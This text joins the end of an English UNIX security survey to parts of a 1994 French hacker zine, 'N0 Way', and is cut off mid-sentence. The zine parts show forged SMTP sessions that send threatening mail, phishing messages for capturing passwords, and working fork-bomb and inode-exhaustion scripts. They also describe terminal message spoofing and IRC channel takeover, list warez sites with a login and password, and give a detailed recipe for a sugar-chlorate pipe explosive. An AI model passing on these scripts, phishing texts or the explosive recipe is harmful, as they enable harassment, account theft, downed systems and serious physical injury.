files, but the size of .rhosts files increased, as well as the number of trusted off-site hosts. Although it was very difficult to verify how many of the entries were valid, with such hostnames such as "Makefile", "Message-Id:", and "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we question the wisdom of putting a site's security in the hands of its users. Many users (especially the ones with larger .rhosts files) attempted to put shell-style comments in their .rhosts files, which most UNIX systems attempt to resolve as valid host names. Unfortunately, an attacker can then use the DNS and NIS hostname spoofing techniques discussed earlier to set their hostname to "#" and freely log in. This puts a great many sites at risk (at least one major vendor ships their systems with comments in their /etc/hosts.equiv files.) You might think that these sites were not typical, and, as a matter of fact, they weren't. Virtually all of the administrators knew a great deal about security and write security programs for a hobby or profession, and many of the sites that they worked for did either security research or created security products. We can only guess at what a "typical" site might look like. ---- Appendix C: After receiving mail from a site that had been broken into from one of our systems, an investigation was started. In time, we found that the intruder was working from a list of ".com" (commercial) sites, looking for hosts with easy-to steal password files. In this case, "easy-to-steal" referred to sites with a guessable NIS domainname and an accessible NIS server. Not knowing how far the intruder had gotten, it looked like a good idea to warn the sites that were in fact vulnerable to password file theft. Of the 656 hosts in the intruder's hit list, 24 had easy-to-steal password files -- about one in twenty-five hosts! One third of these files contained at least one password-less account with an interactive shell. With a grand total of 1594 password-file entries, a ten-minute run of a publically-available password cracker (Crack) revealed more than 50 passwords, using nothing but a low-end Sun workstation. Another 40 passwords were found within the next 20 minutes; and a root password was found in just over an hour. The result after a few days of cracking: five root passwords found, 19 out of 24 password files (eighty percent) with at least one known password, and 259 of 1594 (one in six) passwords guessed. ---- Appendix D: How to get some free security resources on the Internet Mailing lists: o The CERT (Computer Emergency Response Team) advisory mailing list. Send e-mail to cert@cert.org, and ask to be placed on their mailing list. o The Phrack newsletter. Send an e-mail message to phrack@well.sf.ca.us and ask to be added to the list. o The Firewalls mailing list. Send the following line to majordomo@greatcircle.com: subscribe firewalls o Computer Underground Digest. Send e-mail to tk0jut2@mvs.cso.niu.edu, asking to be placed on the list. Free Software: COPS (Computer Oracle and Password System) is available via anonymous ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+. The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl, in pub/security. The latest version of berkeley sendmail is available via anonymous ftp from ftp.cs.berkeley.edu, in ucb/sendmail. Sources for ftpd and many other network utilities can be found in ftp.uu.net, in packages/bsd-sources. Source for ISS (Internet Security Scanner), a tool that remotely scans for various network vulnerabilities, is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume40/iss. Securelib is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume36/securelib. ---- Bibliography: Baldwin, Robert W., Rule Based Analysis of Computer Security, Massachusetts Institute of Technology, June 1987. Bellovin, Steve, Using the Domain Name System for System Break-ins, 1992 (unpublished). Massachusetts Institute of Technology, X Window System Protocol, Version 11, 1990. Shimomura, Tsutomu, private communication. Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992. ---- Suggested reading: Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite", Computer Communication Review 19 (2), 1989; a comment by Stephen Kent appears in volume 19 (3), 1989. Garfinkle, Simson and Spafford, Gene, "Practical UNIX Security", O'Reilly and Associates, Inc., 1992. Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol Study: Network Information Service", Computer Communication Review 22 (5) 1992. Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume Four, Issue Forty-Three, File 14 of 27. Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept 1993. Schuba, Christoph, "Addressing Weaknesses in the Domain Name System Protocal", Purdue University, August 1993. Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM 27 (8), 1984. -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.12 o/~ Paranoia ! o/~ Paranoia o/~ ---===***###> Plaisanter sous Unix <###***===--- o/~ They are Back ! o/~ Vous vous etes toujours demand‚ comment jouer des farces sous Unix, comment foutres les boules a vos potes, a votre administrateur, jouer au con avec le psyche des autres, faire du SEAO? Eh bien voila le but de cet autre petit ++N-Phile. Amusez vous bien ! [ nota : tout ce qui est tap‚ au clavier est pr‚c‚d‚ de ">>>" ] > Mailer sous un autre nom: ======================== Pour cela, il faut connaitre les bases du transfer de mail. Le mail sous Unix est transporte de machine en machine par "sendmail" qui ‚coute les messages des autres mailers ou de ses clients sur le port TCP num‚ro 25. DaubeNet {101} grep smtp /etc/services smtp 25/tcp mail Donc il suffit de se connecter la bas et de respecter le protocole SMTP (Simple Message Transfer Protocol) plus une petite astuce pour faire un faux mail qui pourrait venir de n'importe ou. ---------------------- DaubeNet {102} >>> telnet localhost 25 Trying 127.0.0.1... Connected to univ-anon.fr. Escape character is '^]'. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600 220 ESMTP spoken here >>>help 214-Commands: 214- HELO EHLO MAIL RCPT DATA 214- RSET NOOP QUIT HELP VRFY 214- EXPN VERB 214-For more info use "HELP ". 214-To report bugs in the implementation send email to 214- sendmail@CS.Berkeley.EDU. 214-For local information send email to Postmaster at your site. 214 End of HELP info >>>help helo 214-HELO 214- Introduce yourself. 214 End of HELP info >>>help mail 214-MAIL FROM: 214- Specifies the sender. 214 End of HELP info >>>help rcpt 214-RCPT TO: 214- Specifies the recipient. Can be used any number of times. 214 End of HELP info >>>help data 214-DATA 214- Following text is collected as the message. 214- End with a single dot. 214 End of HELP info >>>help quit 214-QUIT 214- Exit sendmail (SMTP). 214 End of HELP info >>>quit 221 DaubeNet closing connection Connection closed by foreign host. ---------------------- Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger un mail. C'est trŠs facile mais il y a une bidouille qu'il faut connaitre et qui vous trahi si vous ne la connaissez pas. ---------------------- DaubeNet {103} >>> telnet localhost 25 Trying 127.0.0.1... Connected to univ-anon.fr. Escape character is '^]'. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600 220 ESMTP spoken here >>>helo ducon.fbi.com 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you >>>mail from: root@ducon.fbi.com 250 root@ducon.fbi.com... Sender ok >>>rcpt to: fred 250 fred... Recipient ok >>>data 354 Enter mail, end with "." on a line by itself >>> >>>Please, would you stop playing with my Unix system otherwise i'll >>>send a wet operation commando to your university. >>> >>>Nigel X. >>>System Administrator at FBI Inc. >>>root@fbi.com >>>. 250 DAA00299 Message accepted for delivery >>>quit 221 DaubeNet closing connection Connection closed by foreign host. ---------------------- Haha, ca y est, on a envoy‚ notre petite bidouille et le mec va avoir les jetons de sa vie: ---------------------- DaubeNet {104} >>> mail Mail version 5.5 6/1/90. Type ? for help. "/var/mail/fred": 1 message 1 new >N 1 root@ducon.fbi.com Thu Sep 15 03:55 14/508 & >>>1 Message 1: From root@ducon.fbi.com Thu Sep 15 03:55:03 1994 From: root@ducon.fbi.com Apparently-To: fred [ * ] Please, would you stop playing with my Unix system otherwise i'll send a wet operation commando to your university. Nigel X. System Administrator at FBI Inc. root@fbi.com & >>>d & >>>q ---------------------- Arghh... Vous avez vu comme moi la ligne ou j'ai mis une ast‚risque entre crochets : C'est marqu‚: "Apparently-To: " arghhh... Ca fait vraiment pas serieux n'est ce pas? C'est ce qui vous trahi quand vous ne connaissez pas la bidouille. Et en parlant de bidouille, la voici... ---------------------- DaubeNet {105} >>> telnet localhost 25 Trying 127.0.0.1... Connected to univ-anon.fr. Escape character is '^]'. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600 220 ESMTP spoken here >>>helo 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you >>>mail from: root@fbi.com 250 root@fbi.com... Sender ok >>>rcpt to: fred 250 fred... Recipient ok >>>data 354 Enter mail, end with "." on a line by itself >>>To: fred@univ-anon.fr [ * ] >>> >>>Good afternoon, >>> >>> Could you please stop playing with my unix system otherwise i'll >>>be forced to send one of our wet operations' commando to execute you. >>> >>>Nigel X, System Administrator at Fbi Inc. >>>. 250 DAA00307 Message accepted for delivery >>>quit 221 DaubeNet closing connection Connection closed by foreign host. ---------------------- Vous regarderez attentivement la premiere ligne tap‚e aprŠs le DATA. C'est un "To: " suivi de l'adresse a qui on envoie... Et voila le r‚sultat: ---------------------- DaubeNet {106} >>> mail Mail version 5.5 6/1/90. Type ? for help. "/var/mail/fred": 1 message 1 new >N 1 root@fbi.com Thu Sep 15 03:57 14/509 & >>>1 Message 1: From root@fbi.com Thu Sep 15 03:57:41 1994 From: root@fbi.com To: fred@univ-anon.fr Good afternoon, Could you please stop playing with my unix system otherwise i'll be forced to send one of our wet operations' commando to execute you. Nigel X, System Administrator at Fbi Inc. & >>>d & >>>q DaubeNet {107} exit ---------------------- C'est beau non la technique... ;) Grace … cela vous pouvez commencer … lancer la terreur sur votre r‚seau. Hacking Psychology: ================== Les utilisateurs sont par d‚finition trŠs soumis (et c'est pour cela que l'on distingue les hackers, ils refusent cette soumission.) Pour un user lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe qui peut faire du faux mail... Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont completement flooder toute la boite aux lettre de votre/vos victime(s). Mais il y a plus interressant. Imaginez que quelqu'un recoive un message de: security-daemon@ disant: ----- * This is and automated mailing : don't reply * We have found that your password is insecure. You should change this otherwise your account will be disabled. Please use the password "ItG-4v3" instead. Thank you. Security Daemon. ----- Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de comptes. Une fois, j'ai r‚ussi mˆme … faire changer le mot de passe de *l'admin* !!!!! Quel con, il ob‚it … des packages de s‚curit‚ qu'il n'a mˆme pas install‚. AHahaha ! Foutre un systeme sur les genoux: ================================ Pour cela il y a des petits trucs tout con … faire si vous n'avez pas d'accounting: cr‚ez un petit script "toto" de ce type: #!/bin/sh mkdir ./-fuck cp ./toto ./-fuck/toto cd ./-fuck ./toto Hehe, le truc va faire de plus en plus de directory et la machine s'arretera par manque d'inode. On peut aussi faire dans le meme genre un fichier "foo": #!/bin/csh ./foo & ./foo & ./foo & hehe, effet tout aussi garanti... On peut mˆme mixer les deux ! Les messages fantomes: ===================== Vous savez, quand vous faites un write la personne … qui il est d‚stin‚ recoit: Message from at/... Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes non?? Eh bien c'est possible: Il faut savoir comment ca marche. Chaque utilisateur logg‚ a au moins un terminal. Ce terminal est repr‚sent‚ dans le systŠme Unix comme un nom de p‚riph‚rique du type: /dev/ttyXX ou XX est g‚n‚ralement un nombre ou une lettre et un nombre. Bref, c'est la dessus qu'‚crit la commande write. Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en ‚criture sur ce p‚riph‚rique. Sur les anciens systŠme, l'appel systŠme vhangup() n'‚xistait pas et on pouvait donc se connecter, regarder les terminaux disponibles (nons attribu‚s … des users donc en lecture et ecriture pour tout le monde) et faire un cat dessus comme ceci: $ cat >/dev/tty02 ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge par ce terminal. Ensuite, pr‚parer a cot‚ le : Message from root at... Veuillez changer imm‚diatement votre mot de passe en: "TuY5;tK" Merci. Votre administrateur systŠme. Fun isn't it? S'amuser avec les ‚mulateurs de terminaux: ========================================= Vous savez que par exemple zmodem envoie une chaine de caractŠre qui lance automatiquement Zmodem en reception du cote de l'‚mulateur de terminaux. C'est trŠs interressant car on peut faire appeler intempestivement Zmodem dans l'‚mulateur si telle ou telle personne en message on utilise un ‚mulateur de terminaux. Il suffit d'enregistrer la s‚quence envoy‚e par Zmodem pour d‚clancher l'appel de Zmodem et hop, bienvenue en enfer ! Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c et son ancetre qui ne le fait pas mais est sympa: flash.c. -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.13 ^^^^^^^^^^^^^^^^^^^^^^^^^ >>>>>>>> du cote <<<<<<<< ======= d'internet ====== vvvvvvvvvvvvvvvvvvvvvvvvv Chez les internetiens, ca a boug‚ sacrement, apres les emmerde de Philip Zimmerman accus‚ par la NSA et la CIA d'avoir export‚ un logiciel de cryptographie (PGP) les hackers se sont mis a remuer sec. Le probleme de PGP a ‚t‚ r‚solu, la version 2.5 est interdite … l'export mais la 2.6 est okay et exportable ! STICK WITH 2.5, IT'S THE MOST SECURE! Les experts en s‚curit‚ d'une grosse agence francaise ont d‚clar‚ recemment: "On leur a bien fait la nique"... J'ai bien peur que la plus grosse "nique" ce soit nous qui la faisions prochainnement. En effet, beaucoup de jeunes hackers se sont lanc‚s a fond dans le hack professionel. Grace … des listes de diffusions comme 8lgm et bugtraq, ils ont acqui un savoir faire impressionant. A suivre... | Underground sites | Sur Internet, il y a des serveurs FTP ou FSP qui h‚bergent sans le savoir des sanctuaires du hacking ou de la scene 0-day warez. Voici une petite liste qui a ‚t‚ r‚cuper‚e aux USA: ============ ----++++ Betaz List ++++---- -= These sites are up 9.05.94 =- ------------------------------------------------------------------------------ FTP ~~~ sy2000.cet.fsu.edu /incoming/msdos/./.^l^k pc|mac|fast cs.uidaho.edu /pub/incoming/MacPGP/"" pc|mac 130.246.23.9 /pub/others/".. "/".. " pc|mac 130.246.17.54 /pub/".. "/".cache " " " brinta.ptf.hro.nl ** Private ** 160.78.31.26 /incoming/".. " pc ic16.ee.umanitoba.ca /pub/PSCAD_RTDS/incoming/te few acme.fred.org /pub/msdos/Tmp/^X few Console ~~~~~~~ syr.edu /software/unix/kip/dpf snes|sega 131.215.46.20 1717 snesapalooza To add to or recieve an updated list mail an112452 or msg betaz on irc ============ Voila, donc vous pouvez aller y faire des tours, c'est pas mal. Ce sont des warez en general de bonne qualit‚. Et voila une autre liste: ============ FDISK and FERN's Warez List 9:09PM 8/24/94 Atlantic FDISK V5.6 All of the sites have been test as of the date and time above FTP Site Dir Submitted By -------------------------------------------------------------------- corto.inria.fr /broadcast/^K^E^F^E^L Skippy tiger.vut.edu.au login:r9202044 Pass:Daavee ".. " 192.54.41.33 /pub/avs_mirror/pub/siggraph/uploads/"..." cc acme.fred.org /pub/msdos/tmp/".. " swazi 130.246.23.9 /pub/others Hi-Fi Site Port Submitted By -------------------------------------------------------------------- 130.161.39.3 5300 Wowzer 128.206.29.11 12321 Bryer 158.132.79.228 1997 casey(anon 10285) ============ | IRC | Vous connaissez IRC? L'Internet Relay Chat... C'est le havre dans lequel tous les internet junkies viennent discuter de n'importe quoi. Un des "channel" les plus virulent est #hack (suivi de pres par #warez et #phreak). La dedans se livre une petite guerre permanente … qui aura les droits operateurs sur le channel, pour cela, nous avons recours … des outils assez rigolos. Tout d'abord, chaque bon hacker qui se respecte a sa propre armure personnelle le protegeant des divers Tsunamis ou Rolling Bombs qui ne sont que des attaques software destin‚es … virer quelqu'un du channel. Les plus connus de ces logiciels sont GargOyle et Serpent de Vassago, personnage tres controvers‚ sur Internet. (gargoyle.tar.Z, serpent.tar.Z, ircdfens.tar.Z, util662.tar.Z, textbox.tar.Z) Ensuite vient le hack hard qui passe souvent par l'arret de serveur IRC isolant un connecte de l'ensemble des autres connecte et qui donne ainsi les chanops (channel operators) au connecte isole. Fun isn't it? La pluspart du temps vous ne trouverez personne d'interessant au premier abord sur #hack. Mais de nombreuses personnes interressantes y passent souvent. Donc la premiere impression de conneries inutiles n'est pas forcemment vraie pour tout le monde. Comment se connecter sur IRC? - - - - - - - - - - - - - - - Eh bien tout d'abord il vous faut un client IRC que vous compilerez pour votre unix (si vous avez un PC sous SLIP et PPP, il vous faudra chercher un client IRC pour PC). Ensuite, vous devrez trouver un serveur IRC qui marche dans votre coins (pas trop loin dans le reseau) et qui vous accepte en tant que connecte. Si vous prenez un serveur irc trop loin (comptez la "distance" avec traceroute), vous aurez des delais dans votre dialogue. Il vous faut aussi et bien sur un acces Internet. Une fois que vous aurez fix‚ tout cela, vous pourrez vous connecter sur IRC. Comment utiliser? - - - - - - - - - Les commandes IRC sont assez simple. Je vous conseille de prendre un client IRC II car ils permettent vraiment des choses tres cool. Ils vous permettent par exemple de faire du transfert de fichier avec quelqu'un en restant connecte sur le chat et en continuant de discuter. On change son nickname (pseudo) avec: /NICK On va dans un channel en faisant: /join # Les noms de channels commencent toujours par # On quitte un channel en faisait: /leave On sort du client en faisant: /exit On envoie un message prive non securise … quelqu'un: /msg On regarde qui il y a dans le channel avec: /who # voila les commandes de base. Explication du fonctionnement du reseau IRC. - - - - - - - - - - - - - - - - - - - - - - On utilise l'IRC avec un client qui se connecte … un serveur IRC. Ce serveur IRC est connecte … d'autres serveurs IRC. Ainsi, il y a un traffic moins important car l'information est distribuee sur les serveurs IRC. Si chacun choisit un serveur IRC proche de chez lui (pas beaucoup de internet hop, les saut de puces que l'on voit avec traceroute), les liaisons internationales ne seront utilis‚es que par les serveurs et donc pas de gaspillage! Ainsi on aura: Client Client Client Client__ | `\ | `\ | `\ | `\ | `\ | Client----IrcServ3==========IrcServ4=====IrcServ5-----Client || \ || \ || \ Client----IrcServ2==========IrcServ1 Client | | | | Client Client Si il y une coupure reseau entre IrcServ1 et IrcServ2 le user connecte sur IrcServ1 n'aura plus qu'a quitter et revenir dans le channel en question et des a present il aura les chanops sur le reseau car IrcServ1 croit alors qu'il est tout seul dans le reseau puisqu'il ne voit pas les autres au dela de la coupure reseau (que l'on appelle netsplit). Ainsi, des que la connection entre IrcServ 1 et 2 reviendra, le Client de IrcServ 1 sera chanop et le restera : il sera devenu chanops. Donc le jeu est pour certain de devenir chanop et de faire "tomber" la liaison entre son serveur local et le serveur qui fournit le feed IRC a son serveur local. Je sais, c'est vicieux mais a la fin ca n'a plus d'interet tant c'est commun sur Irc. Au niveau des chanops, il faut savoir que le premier qui se connecte dans un channel deviens automatiquement le maitre du channel avec ses chanops. Il peut ainsi: - ejecter quelqu'un du channel (/kick ) - modifier le sujet (topic) du channel (/topic # ) - rendre operateur quelqu'un d'autre (/mode +o ) - enlever l'operateur … quelqu'un (/mode -o ) - modifier les droits d'acces au channel (on peut banir du channel certainnes personnes, certainnes adresses etc...) Quelques conseils: - - - - - - - - - Ne tapez pas tout ce que l'on vous dit de taper et surtout ne tapez pas des trucs du style /ON ou /EXEC car si vous etes sous Unix, cela vous fera executer des choses qui peuvent ˆtre des backdoor pour revenir sur votre suite ensuite. Evitez de faire chier les personnes avec un @ devant leur nom, ce sont les chanops! Avant d'utiliser un script Irc II que l'on vous envoie, verifiez bien qu'il ne contient pas de backdoor! Voila ! - - - - Vous voila prˆt pour aborder l'IRC sans difficult‚! Attention, on devient vite accro a ce service de l'internet. Peut etre demanderez vous un jour en vous debranchant de votre NeuroPrise (tm) "y a t'il une vie aprŠs l'IRC?" ++NeurAlien. | Internet for the masses | La France ‚tait (JE DIS BIEN ETAIT) s‚rieusement dans la merde car aucun acces public … l'Internet n'‚tait disponible … des prix abordables. Bien sur il y avait des passes droits accord‚s … certains privil‚gi‚ qui b‚n‚ficiaient de l'acces d'un universit‚ ou d'un institut pour utiliser Internet. Depuis quelques mois, il semble que tout ait un peu chang‚. Il est apparu d'abord des services minitels proposant mail et news. Bien sur, ce genre de service est une vraie arnaque car il ne fournit pas quelque chose d'agr‚able (vous avez deja les news a 1200/75 bauds????). De plus, ils se sont avere de qualit‚ assez m‚diocre. Pour n'en citer que quelques uns, ya TEASER et sa flopp‚e de services parallŠle destin‚ … se faire du fric sans se pr‚ocupper des connect‚s (Sniifff Sniiff... mais oui, je reconnais cette odeur de pourriture... mais c'est... c'est.... c'est J.. et C...) et les services EMAIL, INTERNET etc... Ensuite ya des trucs largement plus serieux qui se sont mont‚. On a tout d'abord entendu parler de boites qui voulaient faire du dialup IP. Ma premiŠre r‚action a ‚t‚: "Et merde, ca y est, encore des arnaqueurs qui viennent squatter une de ces derniere place de libert‚ qu'est l'Internet". Alors on a vu apparaitre en premier un truc appel‚ World-Net. Ne voulant pas juger … la l‚gŠre, j'ai demand‚ des infos et voila: 80 F de l'heure pour le Full IP (FTP, Telnet, Mosaic etc...) 40 F de l'heure pour le Mail, News et IRC. Je me suis dit: "arghhh... putain c'est cher" Et quelle connerie j'ai dit la, j'avais pas vu ce qui suivait. Au mois de Juin et Juillet d'autres boites se sont fait connaitre: >FranceNet qui fait passer son service pour de l'internet alors que c'est juste un BBS connect‚ … l'internet qui ne permet pas de faire reellement du Dialup IP, bref, c'est vraiment pour le con moyen qui sait pas se servir de son clavier. En plus c'est hyper cher (36 68) et ca fonctionne trŠs mal! >Calvanet : alors la c'est une arnaque incroyable... meme pas la peine d'en parler. C'est la pourriture Calvacom revue et corrigee pour Internet. >France Telecom et leur service internet: si vous avez plus de 10 000 F par mois a mettre dans une liaison qui n'est meme pas permanent pour ce prix la, vous pouvez toujours tenter. J'ai rarement vu une boite qui ait le culot de faire cela quand meme! C'est une honte ! Bref, dans les 4 fournisseurs World-Net, francenet, calvanet et l'offre FT, c'est bien WorldNet qui est le moins cher. Alors je recapitule les infos que j'ai eu sur eux (worldnet): >Pas d'abonnement. >Pour le Full IP : 80 F HT / heure >Pour le Mail, News et IRC: 40 F / heure pas d'autre frais. pas de frais … la mise en place. Ils peuvent fournir un package de communication pour PC ou Mac. Bref... c'est pas les prix fabuleux qu'on pourrais avoir aux US mais c'est pas mal quand meme. Voila, j'espere que ca vous ‚vitera de vous faire pieger. J'ai des potes pourtant pas trop naze qui se sont fait pieger par les arnaqueurs de Francenet. Ca semble ne rien couter car c'est en 36 68 (2.19F / minute) et quand tu recois la facture FT, il est deja trop tard ! Amusez vous bien avec Internet. ++NeurAlien. P.S: J'ai une information tres tres tres interressante. WorldNet fait une "semaine Worldnet" avec Internet gratuit pour n'importe qui le demandant. C'est trop cool. Je me rappelle plus de la date mais ils ont un service qui informe la dessus, c'est le 3615 Worldnet ou le 3617 SCT je crois. Je met les coordonn‚es de t‚l‚phone de cette boite: Tel: (1) 60 20 85 14 Hehe... moi c'est sur, je vais demander un compte pour ce truc ! Disclaimer: J'en ai rien a foutre si mes propos font chier certainnes des boites mentionn‚es (francenet, WorldNet, Calvanet, France Telecom, teaser etc...). Ce que j'ai dit est vrai et si ca vous plait pas vous avez qu'a ˆtre honnŠtes vous aussi. Je ne suis pas un politicien donc j'en ai rien a cirer de l'avis des pseudo-VIP, je suis pas journaliste et ceci n'est pas un journal alors les proces en diffamations vous pouvez vous les mettre ou je pense. A bon entendeur salut! ++NeurAlien. | Dialup IP | Vous entendez parler partout de Dialup IP et vous ne savez pas ce que ca veut dire. Cette partie est sens‚e vous expliker cela! Dans le temps, avant qu'Internet soit populaire, un vieux systŠme appel‚ UUCP permettait de recevoir son mail et ses news par "… coups" car il fallait aller chercher ses informations sur le serveur et consulter en local. Ensuite on a vu apparaitre pour les privil‚gi‚ des accŠs shell sur des becannes reli‚es … l'Internet. A partir de la, on avait un terminal qui permettait d'utiliser tous les outils d'Unix pour se connecter sur l'Internet: telnet, FTP, IRC, gopher. Mais ca s'est vite trouv‚ d‚pass‚. Par exemple, le World Wide Websted (WWW) qui est un ensemble de serveurs multim‚dias reli‚s par des liens hypertexte et qui fonctionne en reseau ne peut fonctionner qu'avec un terminal ayant des capacite graphiques et sonores. Ce que generalement les terminaux n'ont pas! Bref, il a fallu s'adapter, c'est pour cela que le SLIP puis le PPP ont ‚t‚ cr‚‚. Au lieu de se connecter avec un ‚mulateur de terminal sur un unix et de converser avec un Shell, la politique du SLIP & PPP est de transformer le flux de paquet venant de l'Internet en quelque chose que l'on peut passer sur le lien s‚rie du modem. Donc PPP et SLIP servent … ‚muler en fait une liaison TCP/IP (protocole Internet) sur une communication modem. Bien sur, cette liaison n'est pas permanente. Ainsi, on considŠre la machine de l'utilisateur comme un noeud temporaire d'un reseau connect‚ … Internet. Cette machine (qui peut ˆtre la votre) possŠde donc sa propre adresse. Il faut pour gerer ce flux de paquet qui transite … travers le modem un "Client" PPP ou SLIP qui retransforme ca en quelque chose d'exploitable par les "Clients" IRC, Mosaic (pour le WWW), Telnet, FTP, Gopher, Mail, News. (Le terme client d‚signe un programme qui va traiter l'information dispens‚e par un serveur centralis‚). Avec PPP et SLIP vous pouvez envoyer vos propre paquet. C'est un peu comme la victoire du combat qui se d‚roule sur le cable TV. Les grosses compagnies veulent un systŠme peu interactif qui permettra seulement d'acheter avec son num‚ro de CB des programmes … la t‚l‚. Les cyberpunks veulent un truc totalement interactif qui permet de proposer soi mˆme ses propres service. SLIP et PPP vous permettent de proposer vos propres services … l'ensemble du monde. Bien sur ces services sont accessibles uniquement quand vous etes connect‚. Exemple pratique: emulation SLIP sous Windows. Vous avez un PC. Vous avez un modem 9600 minimum (19200 ou 28800 c'est le reve!). Vous avez les logiciels Trumpet et WinSock. Vous avez les clients Mail (Eudora), News, Mosaic, FTP etc... Trumpet est le logiciel qui vous permet de vous connecter … un service vous fournissant du SLIP. WinSock permet d'‚muler les sockets ("systeme de communication d'Internet" (c'est pas exactement ca)) sous Windows. Les clients exploitent les infos transmises par Trumpet puis WinSock. sch‚ma: ____________________________________________ | Client | Client | Client | Client | Client | | Mail | FTP | Mosaic | News | Irc | |(eudora)| | | | | |--------+--------+--------+--------+--------| | | | WinSock | | ( transforme les infos fournie par Trumpet | | en sockets exploitable par les clients ) | |--------------------------------------------| | | | Trumpett | | ( assure la cnx SLIP et la reception des | | paquets TCP/IP ) | |--------------------------------------------| | | | couche Hard | | communication modem en s‚rie | | | -------------------------------------------- L'avantage avec ce systŠme est que l'on peut utiliser plusieurs clients en mˆme temps: FTP, News et Mosaic par exemple. C'est TRES TRES pratique. Eh bien c'est sur ces mots que je referme la section "du cot‚ d'internet". ++NeurAlien -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.14 [ Petite pr‚cision sur les explosifs: Ce que je vais dire, tout le monde le sais: Les explosifs sont TRES dangereux. Mais bon, on se dit: ouais, je vais assurer etc... mais ca c'est du N'IMPORTE QUOI ! On ne maitrise jamais totalement ce genre de produit (mˆme les artificiers professionels). Un explosif amateur a un probleme: il n'est presque jamais stable, par contre il est en g‚n‚ral aussi fort que les explosifs professionels. Donc, il faut que vous sachiez que chaque ann‚e il y a entre 10 et 100 gosse qui garderont a vie des sequels de ce genre de connerie. (j'ai un ami qui doit tout le temps porter des gants car sinon c'est vraiment pas beau!). DECONNEZ PAS, faites vos m‚langes en petite quantit‚ et n'oubliez pas: ce genre de m‚lange peut ˆtre MORTEL ! ++NeurAlien.] ----------- L'explosif ? tient tient... Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de desherbant (chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les paquet de petards, vous n' avez vous jamais lu 'Ne contient ni chlorate, ni perchlorate' ? La tentation fut forte, et j'achetais le jour suivant les ingredients... Premiere preparation, quelques grammes, moitier sucre, moitier chlorate. J'allume. Stupefaction, ca brulait tres vivement, une flamme jaune extremement lumineuse, pendant quelques secondes, en meme temps ca degageait une fumee blanche tres epaisse avec une odeur de caramel. (la decomposition spectrale est en fait celle du sodium, 2 raies jaunes). Le melange a l'etat brute ne fait que bruler a l'air libre. On dit que le compose fuse. Pour l'utiliser en explosif il fallait donc enfermer le melange dans un tube. J'avais confectionne un tube ouvert d'un cote, et que l'on pouvait ferme de l'autre. J' y mettais dedans les celebres Mammouths. Du cote ouvert on pouvait placer un projectile qui entrait dans le tube. Lorsque le petard claquait le projectile ( ecrou + boulon qui bouchait bien l'entree ) etait expulse avec une force suffisante pour percer une plaque de fer de 1/2 mm d'epaisseur. Bien sur il me fallut peu de temps pour remplacer les Mammouths par le melange. J'avais tasse au fond du tube une epaisseur de peut etre 5mm. Un trou dans le fond du tube laissait passer une meche de petard, ce qui declancherais l'explosion J'essaie. La detonnation fut sourde et grave, on sentait l'onde de choc. Le fond du tube etait finalement eventre, decapite et plie en arcordeon rien qu' avec la force du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si peu de poudre... Afin de perfectionner l'explosif, je fit quelques recherches. Meme le prof de physique s'y etait mis ! Un sacre lascar du Cnrs d'ailleurs. En voici les resultats: Les meilleurs performances sont obtenues en melangeant 2/3 de sucre glace et 1/3 de chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui reste apres que l'on est fait fuser le melange: Reste du rose coulant -> un peu trop de chlorate. Reste noir bousoufle -> trop de sucre. Ce melange augemente ces performances lorsqu'il est humide au toucher. Il ne doit surtout pas etre coulant. Il ne craint donc absolument pas l'humidite, au contraire. Le fin du fin c'est de combiner de l'huile de vaseline. (Quasiment tous les explosifs pro contiennent de l'huile de vaseline, mais cette operation est delicate a realiser). Plus le melange est tasse plus ca pete fort. Ceci est en fait tres important. Apres l'avoir tasse, ca doit etre un bloque dur. Pour le faire, n'utilisez pas d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant meme d'avoir dit 'ouf..' Il est important de remarquer que le melange fuse a partir de 50 degre C ! Le melange est tellement instable, qu'il n'y a pas besoin de flamme pour que ca demarre. Ceci explique aussi pourquoi il est sensible aux chocs (le choc provoque un petit echauffement en un point, meme tres faible), donc attention !!! pas de brutalite. Enfin le melange devient de plus en plus instable au cours du temps s'il est tasse. Apres 24h, ca devient dangereux et risque de bruler (ou peter) tout seul. On utilise au fur et a mesure qu'on fabrique. Une solution pour en garder consiste a humudifier le melange, et le stocker dans un congelateur a -18 deg. Mais mieux vaut l'eviter si on peut. Apres la parfaite maitrise, je confectionnais un gros petard, avec 100 grammes de melange tasse dans un bout de cadre de velo decoupe et ferme au bout a la presse prealablement percer pour laisser passer une meche. -----> Ne percer pas apres avoir mis le melange et fo prendre la precaution de mettre du papier mouchoir ou Wc au bout du tube, afin d'etre sur que l'on ne presse pas le melange !!!!!!!! Operation termine, je vais a la ZUP, ou les petards n'inquiete depuis longtemps plus personne et ou la police ne vient pas. Je le pose sur une plaque en beton des 